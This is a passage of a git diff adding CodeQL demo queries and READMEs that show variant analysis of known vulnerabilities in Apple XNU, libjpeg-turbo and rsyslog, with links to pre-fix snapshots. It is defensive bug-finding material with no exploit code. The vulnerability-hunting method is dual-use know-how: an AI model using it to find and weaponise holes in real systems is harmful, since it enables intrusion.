emulate + | regs.getName() = "regs" and + emulate.getName() = "dtrace_dif_emulate" and + regs.getFunction() = emulate and + this.getArrayBase() = regs.getAnAccess()) + } +} + +class PointerUse extends Expr { + PointerUse() { + exists (ArrayExpr ae | this = ae.getArrayOffset()) or + exists (PointerDereferenceExpr deref | this = deref.getOperand()) or + exists (PointerAddExpr add | this = add.getAnOperand()) + } +} + +class DTraceUnsafeIndexConfig extends DataFlow::Configuration { + DTraceUnsafeIndexConfig() { + this = "DTraceUnsafeIndexConfig" + } + + override predicate isSource(DataFlow::Node node) { + node.asExpr() instanceof RegisterAccess + } + + override predicate isSink(DataFlow::Node node) { + node.asExpr() instanceof PointerUse + } +} + +from DTraceUnsafeIndexConfig config, DataFlow::PathNode source, DataFlow::PathNode sink +where config.hasFlowPath(source, sink) +select sink, source, sink, "DTrace unsafe index" + +/* + * This query has 16 results. The 16th result is the vulnerability: dtrace_isa.c:817 + */ diff --git a/ql_demos/cpp/XNU_DTrace_CVE-2017-13782/README.md b/ql_demos/cpp/XNU_DTrace_CVE-2017-13782/README.md new file mode 100644 index 0000000..b9f2ed7 --- /dev/null +++ b/ql_demos/cpp/XNU_DTrace_CVE-2017-13782/README.md @@ -0,0 +1,5 @@ +[Blog post](https://lgtm.com/blog/apple_xnu_dtrace_CVE-2017-13782) + +Bug was fixed in [macOS High Sierra 10.13.1](https://support.apple.com/en-us/HT208221). + +[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13) has the bug. diff --git a/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql new file mode 100644 index 0000000..0cb626f --- /dev/null +++ b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/BCopyNegativeSize.ql @@ -0,0 +1,38 @@ +/** + * @name bcopy with negative size + * @description Calling bcopy with a negative size argument will crash the + * kernel due to a negative integer overflow. + * @kind path-problem + * @problem.severity warning + * @id apple-xnu/cpp/bcopy-negative-size + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis +import DataFlow::PathGraph + +class MyCfg extends DataFlow::Configuration { + MyCfg() { + this = "MyCfg" + } + + override predicate isSink(DataFlow::Node sink) { + exists (FunctionCall call + | sink.asExpr() = call.getArgument(2) and + call.getTarget().getName() = "__builtin___memmove_chk" and + lowerBound(sink.asExpr()) < 0) + } + + override predicate isSource(DataFlow::Node source) { + source.asExpr().(FunctionCall).getTarget().getName() = "mbuf_data" + } + + override predicate isAdditionalFlowStep(DataFlow::Node node1, DataFlow::Node node2) { + node2.asExpr() = node1.asExpr().getParent() + } +} + +from DataFlow::PathNode sink, DataFlow::PathNode source, MyCfg dataFlow +where dataFlow.hasFlowPath(source, sink) +select sink, source, sink, "The size argument of bcopy might be negative." diff --git a/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md new file mode 100644 index 0000000..7ca34fd --- /dev/null +++ b/ql_demos/cpp/XNU_NFS_Boot_CVE-2018-4136_CVE-2018-4160/README.md @@ -0,0 +1,5 @@ +[Blog post](https://lgtm.com/blog/apple_xnu_nfs_boot_CVE-2018-4136_CVE-2018-4160) + +Bug was fixed in [macOS High Sierra 10.13.4](https://support.apple.com/en-gb/HT208692). + +[This snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip) has the bug. diff --git a/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/ArrayIndexMightOverflow.ql b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/ArrayIndexMightOverflow.ql new file mode 100644 index 0000000..94299c7 --- /dev/null +++ b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/ArrayIndexMightOverflow.ql @@ -0,0 +1,18 @@ +/** + * @name Array index might overflow + * @description An array indexing expression of the form + * x[i+j] could cause an out-of-bounds write. + * @kind problem + * @problem.severity warning + * @id apple-xnu/cpp/array-index-might-overflow + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// Find an assignment like this: x[i+j] = v +from ArrayExpr ae, BinaryArithmeticOperation idx, Assignment assign +where ae = assign.getLValue() + and idx = ae.getArrayOffset() + and convertedExprMightOverflow(idx) +select idx, "Array index might overflow" diff --git a/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/InfiniteLoop.ql b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/InfiniteLoop.ql new file mode 100644 index 0000000..cd78f5b --- /dev/null +++ b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/InfiniteLoop.ql @@ -0,0 +1,23 @@ +/** + * @name Infinite loop + * @description Updating a loop index with a compound assignment + * could cause non-termination. + * @kind problem + * @problem.severity warning + * @id apple-xnu/cpp/infinite-loop + */ + +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis + +// Find loops like this: +// while (x) { ...; x -= n; } +from Loop loop, Variable v, AssignArithmeticOperation assign +where (loop.getCondition() = v.getAnAccess() or + loop.getCondition().(ComparisonOperation).getAnOperand() = v.getAnAccess()) + and assign.getLValue() = v.getAnAccess() + // Compound assignment is in the body of the loop: + and assign = loop.getStmt().getAChild*() + and lowerBound(assign.getRValue()) <= 0 + and upperBound(assign.getRValue()) >= 0 +select loop, "Loop might not terminate due to this $@.", assign, "assignment" diff --git a/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/README.md b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/README.md new file mode 100644 index 0000000..58bc6be --- /dev/null +++ b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/README.md @@ -0,0 +1,13 @@ +https://lgtm.com/blog/apple_xnu_packet_mangler_CVE-2017-13904 + +There were multiple bugs in `packet_mangler.c`. One of the infinite loop bugs was fixed in macOS High Sierra 10.13.2. The other bugs were fixed in macOS High Sierra 10.13.5. + +For a demo, the best query to show is `tcphdr_mbuf_copydata.ql`, because it shows uses taint tracking to show the stack buffer overflow. + +`ArrayIndexMightOverflow.ql` is a simplified version of the query that originally led us to look at this code. It looks for array indices that might be negative. + +`InfiniteLoop.ql` is a query inspired by one of the bugs in this code: the loop might not terminate because the loop counter is updated with a compound assignment (`+=`). We wrote an exploit which causes the right hand side of the assignment to be zero, which means that the loop runs forever. + +All three queries find results in [this snapshot](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/XNU-revision-2017-June-13--15-52-38.zip) (macOS 10.13). + +The queries also find results in [this newer snapshot for 10.13.3](https://downloads.lgtm.com/snapshots/cpp/apple/xnu/xnu-4570.41.2_macOS-10.13.3_Semmle-1.16.1.zip). Apple thought they had fixed the infinite loop bug in 10.13.2, by changing the loop condition to a `>`. They were wrong. diff --git a/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/tcphdr_mbuf_copydata.ql b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/tcphdr_mbuf_copydata.ql new file mode 100644 index 0000000..bbf401c --- /dev/null +++ b/ql_demos/cpp/XNU_packet-mangler_CVE-2018-4249/tcphdr_mbuf_copydata.ql @@ -0,0 +1,32 @@ +/** + * @name tcphdr flow to mbuf_copydata + * @description Expressions of type tcphdr usually contain values that can + * be controlled by an attacker. Therefore, it is dangerous to + * use any of those values as the size argument of + * mbuf_copydata. + * @kind path-problem + * @problem.severity warning + * @id apple-xnu/cpp/tcphdr_mbuf_copydata + */ + +import cpp +import semmle.code.cpp.dataflow.TaintTracking +import DataFlow::PathGraph + +class Config extends TaintTracking::Configuration { + Config() { this = "tcphdr_flow" } + + override predicate isSource(DataFlow::Node source) { + source.asExpr().getType().stripType().getName() = "tcphdr" + } + + override predicate isSink(DataFlow::Node sink) { + exists (FunctionCall call + | call.getArgument(2) = sink.asExpr() and + call.getTarget().getName() = "mbuf_copydata") + } +} + +from Config cfg, DataFlow::PathNode source, DataFlow::PathNode sink +where cfg.hasFlowPath(source, sink) +select sink, source, sink, "tcp" diff --git a/ql_demos/cpp/libjpeg-turbo-oob/01_find_colormap_index.ql b/ql_demos/cpp/libjpeg-turbo-oob/01_find_colormap_index.ql new file mode 100644 index 0000000..d10ec56 --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/01_find_colormap_index.ql @@ -0,0 +1,8 @@ +import cpp + +// Find expressions of the form `base->colormap[i][j]` + +from ArrayExpr outer, ArrayExpr inner +where inner = outer.getArrayBase() and + inner.getArrayBase().(FieldAccess).getTarget().getName() = "colormap" +select outer, "Indexing into colormap." diff --git a/ql_demos/cpp/libjpeg-turbo-oob/02a_find_guarded_colormap_index.ql b/ql_demos/cpp/libjpeg-turbo-oob/02a_find_guarded_colormap_index.ql new file mode 100644 index 0000000..cc5f1eb --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/02a_find_guarded_colormap_index.ql @@ -0,0 +1,30 @@ +import cpp +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.controlflow.Guards +import Options + +// Find expressions of the form `base->colormap[i][j]` where +// `j` is checked against `base->cmap_length` + +/** + * Gets an expression of the form `base->fieldName`, where `base` + * is of type `_bmp_source_struct`. + */ +Expr bmpSourceStructField(GVN base, string fieldName) { + exists (FieldAccess fa | + fa.getTarget().getName() = fieldName and + fa.getTarget().getDeclaringType().hasName("_bmp_source_struct") and + base = globalValueNumber(fa.getQualifier()) and + globalValueNumber(result) = globalValueNumber(fa) + ) +} + +from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index +where inner = outer.getArrayBase() and + inner.getArrayBase() = bmpSourceStructField(base, "colormap") and + outer.getArrayOffset() = index.getAnExpr() and + exists (GuardCondition gc, Expr bound | + bound = bmpSourceStructField(base, "cmap_length") and + gc.ensuresLt(index.getAnExpr(), bound, 0, inner.getBasicBlock(), true) + ) +select outer, "Guarded indexing into colormap." diff --git a/ql_demos/cpp/libjpeg-turbo-oob/02b_find_guarded_colormap_index_working.ql b/ql_demos/cpp/libjpeg-turbo-oob/02b_find_guarded_colormap_index_working.ql new file mode 100644 index 0000000..d61d3b2 --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/02b_find_guarded_colormap_index_working.ql @@ -0,0 +1,40 @@ +import cpp +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.controlflow.Guards +import Options + +// Find expressions of the form `base->colormap[i][j]` where +// `j` is checked against `base->cmap_length` + +/** Recognize `error_exit` as a non-returning function. */ +class JpegTurboCustomOptions extends CustomOptions { + override predicate exprExits(Expr e) { + super.exprExits(e) or + exists (ExprCall c | e = c | + c.getExpr().(PointerDereferenceExpr).getOperand().(FieldAccess).getTarget().hasName("error_exit") + ) + } +} + +/** + * Gets an expression of the form `base->fieldName`, where `base` + * is of type `_bmp_source_struct`. + */ +Expr bmpSourceStructField(GVN base, string fieldName) { + exists (FieldAccess fa | + fa.getTarget().getName() = fieldName and + fa.getTarget().getDeclaringType().hasName("_bmp_source_struct") and + base = globalValueNumber(fa.getQualifier()) and + globalValueNumber(result) = globalValueNumber(fa) + ) +} + +from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index +where inner = outer.getArrayBase() and + inner.getArrayBase() = bmpSourceStructField(base, "colormap") and + outer.getArrayOffset() = index.getAnExpr() and + exists (GuardCondition gc, Expr bound | + bound = bmpSourceStructField(base, "cmap_length") and + gc.ensuresLt(index.getAnExpr(), bound, 0, inner.getBasicBlock(), true) + ) +select outer, "Guarded indexing into colormap." diff --git a/ql_demos/cpp/libjpeg-turbo-oob/03_find_unguarded_colormap_index.ql b/ql_demos/cpp/libjpeg-turbo-oob/03_find_unguarded_colormap_index.ql new file mode 100644 index 0000000..10b35d1 --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/03_find_unguarded_colormap_index.ql @@ -0,0 +1,46 @@ +/** + * @problem.severity error + * @kind problem + * @id libjpeg/unguarded-colormap-index + */ + +import cpp +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.controlflow.Guards +import Options + +// Find expressions of the form `base->colormap[i][j]` where +// `j` is checked against `base->cmap_length` + +/** Recognize `error_exit` as a non-returning function. */ +class JpegTurboCustomOptions extends CustomOptions { + override predicate exprExits(Expr e) { + super.exprExits(e) or + exists (ExprCall c | e = c | + c.getExpr().(PointerDereferenceExpr).getOperand().(FieldAccess).getTarget().hasName("error_exit") + ) + } +} + +/** + * Gets an expression of the form `base->fieldName`, where `base` + * is of type `_bmp_source_struct`. + */ +Expr bmpSourceStructField(GVN base, string fieldName) { + exists (FieldAccess fa | + fa.getTarget().getName() = fieldName and + fa.getTarget().getDeclaringType().hasName("_bmp_source_struct") and + base = globalValueNumber(fa.getQualifier()) and + globalValueNumber(result) = globalValueNumber(fa) + ) +} + +from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index +where inner = outer.getArrayBase() and + inner.getArrayBase() = bmpSourceStructField(base, "colormap") and + outer.getArrayOffset() = index.getAnExpr() and + not exists (GuardCondition gc, Expr bound | + bound = bmpSourceStructField(base, "cmap_length") and + gc.ensuresLt(index.getAnExpr(), bound, 0, inner.getBasicBlock(), true) + ) +select outer, "Unguarded indexing into colormap." diff --git a/ql_demos/cpp/libjpeg-turbo-oob/04_find_unguarded_colormap_no_fps.ql b/ql_demos/cpp/libjpeg-turbo-oob/04_find_unguarded_colormap_no_fps.ql new file mode 100644 index 0000000..dd631f2 --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/04_find_unguarded_colormap_no_fps.ql @@ -0,0 +1,130 @@ +/** + * @problem.severity error + * @kind problem + * @id libjpeg/unguarded-colormap-index + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.controlflow.Guards +import Options + +// Find expressions of the form `base->colormap[i][j]` where +// `j` is checked against `base->cmap_length` + +/** Recognize `error_exit` as a non-returning function. */ +class JpegTurboCustomOptions extends CustomOptions { + override predicate exprExits(Expr e) { + super.exprExits(e) or + exists (ExprCall c | e = c | + c.getExpr().(PointerDereferenceExpr).getOperand().(FieldAccess).getTarget().hasName("error_exit") + ) + } +} + +/** + * Gets an expression of the form `base->fieldName`, where `base` + * is of type `_bmp_source_struct`. + */ +Expr bmpSourceStructField(GVN base, string fieldName) { + exists (FieldAccess fa | + fa.getTarget().getName() = fieldName and + fa.getTarget().getDeclaringType().hasName("_bmp_source_struct") and + base = globalValueNumber(fa.getQualifier()) and + globalValueNumber(result) = globalValueNumber(fa) + ) +} + +/** + * Holds if `assgn` allocates a new colour map of the given `size` and + * stores it into `base->colormap`. + */ +predicate colormapInit(AssignExpr assgn, Expr base, Expr size) { + exists (FieldAccess cmap, ExprCall alloc, PointerDereferenceExpr pd | + assgn.getLValue() = cmap and + base = cmap.getQualifier() and + cmap.getTarget().hasQualifiedName("_bmp_source_struct::colormap") and + assgn.getRValue() = alloc and + pd = alloc.getExpr() and + pd.getOperand().(FieldAccess).getTarget().getName() = "alloc_sarray" and + size = alloc.getArgument(2) + ) +} + +/** + * A flow configuration for tracking structs that contain colour maps. + */ +class ColorMapTracker extends DataFlow::Configuration { + ColorMapTracker() { this = "ColorMapTracker" } + + predicate isSource(AssignExpr assgn, DataFlow::Node nd) { + exists (Expr s | colormapInit(assgn, s, _) | useUsePair(_, s, nd.asExpr())) + } + + override predicate isSource(DataFlow::Node nd) { + isSource(_, nd) + } + + override predicate isSink(DataFlow::Node nd) { + any() + } +} + +/** + * A flow configuration for tracking expressions that denote the size of + * colour maps. + */ +class ColorMapSizeTracker extends DataFlow::Configuration { + ColorMapSizeTracker() { this = "ColorMapSizeTracker" } + + predicate isSource(AssignExpr assgn, DataFlow::Node nd) { + exists (Expr s | colormapInit(assgn, _, s) | useUsePair(_, s, nd.asExpr())) + } + + override predicate isSource(DataFlow::Node nd) { + isSource(_, nd) + } + + override predicate isSink(DataFlow::Node nd) { + any() + } +} + +/** + * Holds if `ae` indexes into the colour map allocated at `origin`. + */ +predicate isColorMapIndex(ArrayExpr ae, AssignExpr origin) { + exists (ColorMapTracker cfg, FieldAccess fa, DataFlow::Node source | + fa = ae.getArrayBase().(ArrayExpr).getArrayBase() and + fa.getTarget().getName() = "colormap" and + cfg.isSource(origin, source) and + cfg.hasFlow(source, DataFlow::exprNode(fa.getQualifier())) + ) +} + +/** + * Holds if `sz` refers to the size of the colour map allocated at `origin`. + */ +predicate isColorMapSize(Expr sz, AssignExpr origin) { + exists (ColorMapSizeTracker cfg, DataFlow::Node source | + cfg.isSource(origin, source) and + cfg.hasFlow(source, DataFlow::exprNode(sz)) + ) +} + +from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index +where inner = outer.getArrayBase() and + inner.getArrayBase() = bmpSourceStructField(base, "colormap") and + outer.getArrayOffset() = index.getAnExpr() and + not exists (GuardCondition gc, Expr bound | + bound = bmpSourceStructField(base, "cmap_length") + or + exists (AssignExpr origin | + isColorMapIndex(outer, origin) and + isColorMapSize(bound, origin) + ) + | + gc.ensuresLt(index.getAnExpr(), bound, 0, inner.getBasicBlock(), true) + ) +select outer, "Unguarded indexing into colormap." diff --git a/ql_demos/cpp/libjpeg-turbo-oob/05_find_unguarded_colormap_generalised.ql b/ql_demos/cpp/libjpeg-turbo-oob/05_find_unguarded_colormap_generalised.ql new file mode 100644 index 0000000..ee4da6b --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/05_find_unguarded_colormap_generalised.ql @@ -0,0 +1,128 @@ +/** + * @problem.severity error + * @kind problem + * @id libjpeg/unguarded-colormap-index + */ + +import cpp +import semmle.code.cpp.dataflow.DataFlow +import semmle.code.cpp.valuenumbering.GlobalValueNumbering +import semmle.code.cpp.controlflow.Guards +import Options + +// Find expressions of the form `base->colormap[i][j]` where +// `j` is checked against `base->cmap_length` + +/** Recognize `error_exit` as a non-returning function. */ +class JpegTurboCustomOptions extends CustomOptions { + override predicate exprExits(Expr e) { + super.exprExits(e) or + exists (ExprCall c | e = c | + c.getExpr().(PointerDereferenceExpr).getOperand().(FieldAccess).getTarget().hasName("error_exit") + ) + } +} + +/** + * Gets an expression of the form `base->fieldName`. + */ +Expr bmpSourceStructField(GVN base, string fieldName) { + exists (FieldAccess fa | + fa.getTarget().getName() = fieldName and + base = globalValueNumber(fa.getQualifier()) and + globalValueNumber(result) = globalValueNumber(fa) + ) +} + +/** + * Holds if `assgn` allocates a new colour map of the given `size` and + * stores it into `base->colormap`. + */ +predicate colormapInit(AssignExpr assgn, Expr base, Expr size) { + exists (FieldAccess cmap, ExprCall alloc, PointerDereferenceExpr pd | + assgn.getLValue() = cmap and + base = cmap.getQualifier() and + cmap.getTarget().hasName("colormap") and + assgn.getRValue() = alloc and + pd = alloc.getExpr() and + pd.getOperand().(FieldAccess).getTarget().getName() = "alloc_sarray" and + size = alloc.getArgument(2) + ) +} + +/** + * A flow configuration for tracking structs that contain colour maps. + */ +class ColorMapTracker extends DataFlow::Configuration { + ColorMapTracker() { this = "ColorMapTracker" } + + predicate isSource(AssignExpr assgn, DataFlow::Node nd) { + exists (Expr s | colormapInit(assgn, s, _) | useUsePair(_, s, nd.asExpr())) + } + + override predicate isSource(DataFlow::Node nd) { + isSource(_, nd) + } + + override predicate isSink(DataFlow::Node nd) { + any() + } +} + +/** + * A flow configuration for tracking expressions that denote the size of + * colour maps. + */ +class ColorMapSizeTracker extends DataFlow::Configuration { + ColorMapSizeTracker() { this = "ColorMapSizeTracker" } + + predicate isSource(AssignExpr assgn, DataFlow::Node nd) { + exists (Expr s | colormapInit(assgn, _, s) | useUsePair(_, s, nd.asExpr())) + } + + override predicate isSource(DataFlow::Node nd) { + isSource(_, nd) + } + + override predicate isSink(DataFlow::Node nd) { + any() + } +} + +/** + * Holds if `ae` indexes into the colour map allocated at `origin`. + */ +predicate isColorMapIndex(ArrayExpr ae, AssignExpr origin) { + exists (ColorMapTracker cfg, FieldAccess fa, DataFlow::Node source | + fa = ae.getArrayBase().(ArrayExpr).getArrayBase() and + fa.getTarget().getName() = "colormap" and + cfg.isSource(origin, source) and + cfg.hasFlow(source, DataFlow::exprNode(fa.getQualifier())) + ) +} + +/** + * Holds if `sz` refers to the size of the colour map allocated at `origin`. + */ +predicate isColorMapSize(Expr sz, AssignExpr origin) { + exists (ColorMapSizeTracker cfg, DataFlow::Node source | + cfg.isSource(origin, source) and + cfg.hasFlow(source, DataFlow::exprNode(sz)) + ) +} + +from ArrayExpr outer, ArrayExpr inner, GVN base, GVN index +where inner = outer.getArrayBase() and + inner.getArrayBase() = bmpSourceStructField(base, "colormap") and + outer.getArrayOffset() = index.getAnExpr() and + not exists (GuardCondition gc, Expr bound | + bound = bmpSourceStructField(base, "cmap_length") + or + exists (AssignExpr origin | + isColorMapIndex(outer, origin) and + isColorMapSize(bound, origin) + ) + | + gc.ensuresLt(index.getAnExpr(), bound, 0, inner.getBasicBlock(), true) + ) +select outer, "Unguarded indexing into colormap." diff --git a/ql_demos/cpp/libjpeg-turbo-oob/README.md b/ql_demos/cpp/libjpeg-turbo-oob/README.md new file mode 100644 index 0000000..8e08a09 --- /dev/null +++ b/ql_demos/cpp/libjpeg-turbo-oob/README.md @@ -0,0 +1,16 @@ +This is demo is an example of variant analysis on a recent [bugfix](https://github.com/libjpeg-turbo/libjpeg-turbo/commit/9c78a04df4e44ef6487eee99c4258397f4fdca55) in [libjpeg-turbo](https://github.com/libjpeg-turbo/libjpeg-turbo), an open-source image processing library. + +The fix prevents an out-of-bounds access when processing malformed BMP files: when reading a BMP file, the library allocates a colour map based on the number of colours declared in the BMP header. Later on, individual bytes are read from the file and used as indices into this colour map. Previously, this was done without checking whether the byte actually represented a valid colour, which could cause an out-of-bounds access. The fix introduces a field in the same struct as the colour map that records its size, and checks the index against it, aborting with an error if the index is out of range. + +A snapshot of libjpeg-turbo from before the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-0fa7850aeb273204acd57be11f328b2be5d97dc6.zip), and one that contains the fix is [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d5f281b734425fc1d930ff2c3f8441aad731343e.zip). + +The first five QL files develop a query that flags exactly the fixed accesses on the former snapshot, and nothing on the latter; the last query is a generalisation that finds a new instance of the same problem. All queries are run on the fixed snapshot, except when stated otherwise. + + - 01_find_colormap_index.ql: A simple query to get started; flags all expressions of the form `base->colormap[i][j]`. + - 02a_find_guarded_colormap_index.ql: Refines the previous query to only flag indices into `_bmp_source_struct::colormap`, and among those only the ones that are guarded by a comparison against `_bmp_source_struct::cmap_length`. Uses global value numbering to correlate the references to `colormap` and `cmap_length` to make sure they are on the same base object, and the guards library to reason about guarding. + - 02b_find_guarded_colormap_index_working.ql: The previous query doesn't actually work, since `ERREXIT` isn't recognised as being a non-returning macro. This query fixes that. + - 03_find_unguarded_colormap_index.ql: Flipping the logic around, we now look for _unguarded_ indexing. This gives a few false positives in cases where `cmap_length` isn't used. There is still a guard in these cases, but it's against a parameter that happens to contain the size of the colour map. + - 04_find_unguarded_colormap_no_fps.ql: Add inter-procedural tracking to reason about the flow of colour maps and their sizes. This eliminates the remaining FPs on the fixed snapshot, and gives the expected results on the original snapshot. + - 05_find_unguarded_colormap_generalised.ql: By removing the hardcoded references to `_bmp_source_struct`, we get a more general query that looks for other unguarded indexes into colour maps. This gives yet more false positives, since there are a few other guarding patterns, but the first three results are actually true positives, which we [reported](https://github.com/libjpeg-turbo/libjpeg-turbo/issues/295). A snapshot with these results fixed is available [here](https://downloads.lgtm.com/snapshots/cpp/libjpeg-turbo/libjpeg-turbo-revision-d00d7d8c194e587ed10a395e0f307ce9dddf5687.zip). + +Note that the final query is somewhat non-trivial (>100 LoC, uses global value numbering, guards and inter-procedural flow), so it's perhaps best used with an audience that has seen some simple QL before. diff --git a/ql_demos/cpp/queries.xml b/ql_demos/cpp/queries.xml new file mode 100644 index 0000000..99f4a72 --- /dev/null +++ b/ql_demos/cpp/queries.xml @@ -0,0 +1 @@ + diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/01_find_snprintf.ql b/ql_demos/cpp/rsyslog_CVE-2018-1000140/01_find_snprintf.ql new file mode 100644 index 0000000..e26ac99 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/01_find_snprintf.ql @@ -0,0 +1,14 @@ +import cpp + +/* + * Find all calls to `snprintf`. + * + * Note: you could do this first step with grep. However, + * grep is less good because it doesn't know about macros. + * For example, curl does this: + * + * https://github.com/curl/curl/blob/87501e57f1c166cb250111af54e0470ab8b2099c/lib/curl_printf.h#L42 + */ +from FunctionCall call +where call.getTarget().getName() = "snprintf" +select call diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/02_find_snprintf_with_result.ql b/ql_demos/cpp/rsyslog_CVE-2018-1000140/02_find_snprintf_with_result.ql new file mode 100644 index 0000000..98f432e --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/02_find_snprintf_with_result.ql @@ -0,0 +1,11 @@ +import cpp + +/* + * Only code that uses the result of snprintf might be vulnerable. + * So restrict the results to those where snprintf is not used + * in a "void context". + */ +from FunctionCall call +where call.getTarget().getName() = "snprintf" +and not call instanceof ExprInVoidContext +select call diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/03_find_snprintf_with_result_and_string.ql b/ql_demos/cpp/rsyslog_CVE-2018-1000140/03_find_snprintf_with_result_and_string.ql new file mode 100644 index 0000000..23fc448 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/03_find_snprintf_with_result_and_string.ql @@ -0,0 +1,15 @@ +import cpp + +/* + * Only calls to `snprintf` with `%s` in the format specifier + * are likely to be vulnerable. This is because other format + * specifiers, like `%d` can only change the length of the output + * string by a few character, but `%s` can change it a lot. + * A `%s` specifier is also much more likely to enable an attacker + * to overwrite the stack or heap with working shellcode. + */ +from FunctionCall call +where call.getTarget().getName() = "snprintf" +and not call instanceof ExprInVoidContext +and call.getArgument(2).getValue().regexpMatch("(?s).*%s.*") +select call diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/04_find_snprintf_with_result_and_string_and_local_taint.ql b/ql_demos/cpp/rsyslog_CVE-2018-1000140/04_find_snprintf_with_result_and_string_and_local_taint.ql new file mode 100644 index 0000000..2d23863 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/04_find_snprintf_with_result_and_string_and_local_taint.ql @@ -0,0 +1,16 @@ +import cpp +import semmle.code.cpp.dataflow.TaintTracking + +/* + * Look for dataflow from the result of `snprintf` back to + * its size argument. Note that we no longer need the + * `call instanceof ExprInVoidContext` clause, because this + * is implied by the dataflow. + */ +from FunctionCall call, DataFlow::Node source, DataFlow::Node sink +where call.getTarget().getName() = "snprintf" +and call.getArgument(2).getValue().regexpMatch("(?s).*%s.*") +and TaintTracking::localTaint(source, sink) +and source.asExpr() = call +and sink.asExpr() = call.getArgument(1) +select call diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/05_find_snprintf_with_result_and_string_and_local_taint_ub.ql b/ql_demos/cpp/rsyslog_CVE-2018-1000140/05_find_snprintf_with_result_and_string_and_local_taint_ub.ql new file mode 100644 index 0000000..1a48670 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/05_find_snprintf_with_result_and_string_and_local_taint_ub.ql @@ -0,0 +1,21 @@ +import cpp +import semmle.code.cpp.rangeanalysis.SimpleRangeAnalysis +import semmle.code.cpp.dataflow.TaintTracking + +/* + * Use `SimpleRangeAnalysis` to find an upper bound for the size + * argument. Here, we have just added the upperbound to the output, + * but we could also use it to rule out code that does proper bounds + * checking. + * + * Note: it can also be interesting to add the upperbound to the + * query earlier in the sequence of queries, so that you can see + * that it infers quite tight bounds for some of the calls. + */ +from FunctionCall call, DataFlow::Node source, DataFlow::Node sink +where call.getTarget().getName() = "snprintf" +and call.getArgument(2).getValue().regexpMatch("(?s).*%s.*") +and TaintTracking::localTaint(source, sink) +and source.asExpr() = call +and sink.asExpr() = call.getArgument(1) +select call, upperBound(call.getArgument(1).getFullyConverted()) diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/README.md b/ql_demos/cpp/rsyslog_CVE-2018-1000140/README.md new file mode 100644 index 0000000..36c17f5 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/README.md @@ -0,0 +1,5 @@ +[Blog post](https://lgtm.com/blog/rsyslog_snprintf_CVE-2018-1000140). + +This bug was found by one of our [default queries](https://lgtm.com/rules/1505913226124/). However, it also makes a good example of using QL interactively. The queries in this directory show how you can interactively develop the query. + +Use [this snapshot](https://downloads.lgtm.com/snapshots/cpp/rsyslog/rsyslog/rsyslog-all-revision-2018-April-27--14-12-31.zip). diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/README.md b/ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/README.md new file mode 100644 index 0000000..d71a6e1 --- /dev/null +++ b/ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/README.md @@ -0,0 +1,5 @@ +# Rsyslog demo video + +A recording of this demo can be found [here](https://youtu.be/gfaCZoxH_u4). + +`rsyslog.srt` (in this directory) is the subtitles file for the video. diff --git a/ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt b/ql_demos/cpp/rsyslog_CVE-2018-1000140/Video/rsyslog.srt new 